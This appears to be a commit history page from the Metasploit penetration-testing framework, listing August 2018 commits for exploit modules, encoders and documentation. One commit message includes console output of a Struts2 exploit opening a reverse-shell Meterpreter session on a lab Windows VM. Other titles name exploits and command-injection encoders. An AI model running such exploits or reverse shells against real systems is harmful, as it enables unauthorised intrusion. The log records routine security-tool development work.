Commit Graph

48124 Commits (c4d697a6299c31d833803614a0d290a312c91b40)

Author SHA1 Message Date
Ben Schmeckpeper c4d697a629
Remove trailing space from CVE identifier
ASUS Net4Switch ipswcom exploit mistakenly included a trailing space at the end of its CVE reference.
2018-08-29 14:12:49 -05:00
William Vu 4803c889f9
Land #10507, GPP creds for db_import 2018-08-28 11:45:51 -05:00
Metasploit 1d47b7f880
automatic module_metadata_base.json update 2018-08-27 18:48:24 -07:00
William Vu 6d5960a536
Land #10538, PSH target for struts2_rest_xstream 2018-08-27 20:40:50 -05:00
William Vu 7d21c2094e Improve PSH target and refactor check code 2018-08-27 20:18:35 -05:00
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
2018-08-27 20:01:00 -05:00
Matthew Kienow 9da01723d8
Land #10537, add windows meterpreter audio output 2018-08-27 16:17:27 -04:00
Matthew Kienow b80ca9a315
Bump metasploit-payloads to version 1.3.44 2018-08-27 15:49:51 -04:00
Wei Chen f38d1569b0
Land #10519, Add msfvenom -l archs like -l platforms 2018-08-27 13:52:50 -05:00
Metasploit 68b9243fdc
automatic module_metadata_base.json update 2018-08-27 09:47:26 -07:00
Brent Cook a5c22cf794
Land #10531, fix NOP generator for sparc 2018-08-27 11:39:17 -05:00
Brent Cook 53b369d702 avoid inserting a float into instruction generation randomly 2018-08-27 11:24:38 -05:00
Metasploit b2c464d091
automatic module_metadata_base.json update 2018-08-27 08:58:54 -07:00
Brent Cook 47ca6c6a14
Land #10527, Fix msftdiy EDB link check, enable HTTPS 2018-08-27 10:49:20 -05:00
Metasploit 4c7206972d
automatic module_metadata_base.json update 2018-08-27 04:33:13 -07:00
Jacob Robles 79b3e4564a
Land #10487, add php5 session file target 2018-08-27 06:22:28 -05:00
Brendan Coles 9725e90ba7 Fix msftdiy EDB link check 2018-08-26 04:18:38 +00:00
Metasploit 1370b59e66
automatic module_metadata_base.json update 2018-08-25 20:31:52 -07:00
Brent Cook cb07ba2b6c
Land #10516, Add brace expansion encoder and update ${IFS} encoder 2018-08-25 22:23:07 -05:00
Brent Cook 969170096a
Land #10520, Only allow setting persistence on payload jobs 2018-08-25 22:21:46 -05:00
Metasploit ab9e4a8555
automatic module_metadata_base.json update 2018-08-24 16:18:03 -07:00
William Vu 6df235062b
Land #10505, post-auth and default creds info 2018-08-24 18:08:15 -05:00
William Vu cde82b18ab
Land #10379, tab completion for multiple commands 2018-08-24 18:06:14 -05:00
William Vu e955e8dc15 Clean up code
And hope I didn't break anything.
2018-08-24 18:05:52 -05:00
William Vu 8d6d747aa0 Pluralize arch as archs, not arches 2018-08-24 14:33:36 -05:00
Metasploit 55d8360705
automatic module_metadata_base.json update 2018-08-24 11:26:06 -07:00
Brent Cook 51c024982c
Land #8914, refactor auxiliary/admin/http credential storage 2018-08-24 13:18:32 -05:00
Brent Cook 0141fc109d don't backtrace if there is not a response 2018-08-24 13:17:06 -05:00
Metasploit 3f1c237360
automatic module_metadata_base.json update 2018-08-24 09:43:09 -07:00
Brent Cook d85995f686
Land #10523, Update Foxit Reader PoC Link 2018-08-24 11:35:57 -05:00
Jacob Robles f6674a96d9
Update poc link 2018-08-24 10:52:01 -05:00
Chirag Jariwala 332036bb49
Merge pull request #1 from jrobles-r7/pr10487
Additional path for Linux target
2018-08-24 18:43:35 +05:30
Jacob Robles 7f3824b067
Additional path for Linux target 2018-08-24 07:18:24 -05:00
Green-m 1dd91434f4
Fix #10518, bug fix when add persistent to non-payload job. 2018-08-24 03:39:18 -04:00
Metasploit 66baff289e
automatic module_metadata_base.json update 2018-08-23 20:56:03 -07:00
William Vu 672dbb7acb
Land #9364, HP PJL/SNMP CVE-2017-2741 exploit
Finally!
2018-08-23 22:47:09 -05:00
Green-m 6d84d3bfec
Add tabs auto completion for irb. 2018-08-23 23:29:12 -04:00
Green-m 418b574161
Merge branch 'master' and resolve conflict. 2018-08-23 23:24:23 -04:00
William Vu 98aba35b29 Add msfvenom -l arches like -l platforms 2018-08-23 21:54:29 -05:00
William Vu 318ff95dbd Remove trailing whitespace from netcat payloads
This has been bugging me for so long.
2018-08-23 21:33:58 -05:00
William Vu 4ff2c1dbe8 Add brace expansion encoder 2018-08-23 21:33:43 -05:00
William Vu eeea3356ae Update ${IFS} encoder 2018-08-23 21:33:42 -05:00
William Vu 7c0dd2a0fe Add CmdUnixBrace and update CmdUnixIfs
Acronyms can be capitalized as per the Ruby style guide.
2018-08-23 21:18:09 -05:00
h00die 8213c21dc9
Land #10467 documentation for postgresql hashdump 2018-08-23 21:35:05 -04:00
h00die a866bdd09d slight syntax updates to md 2018-08-23 21:34:48 -04:00
h00die 1585eff29f
Land #10466 docs for postgres_version 2018-08-23 21:10:34 -04:00
h00die 3024725122 slight syntax updates to md 2018-08-23 21:09:52 -04:00
h00die b8ce6782d9
Land #10517 updated docs for CloudMe Sync 2018-08-23 20:54:01 -04:00
Metasploit c9d7b7ac0a
automatic module_metadata_base.json update 2018-08-23 17:02:58 -07:00
Wei Chen 2193dd662d
Land #10504, add Foxit Reader UAF Module and Docs 2018-08-23 18:56:07 -05:00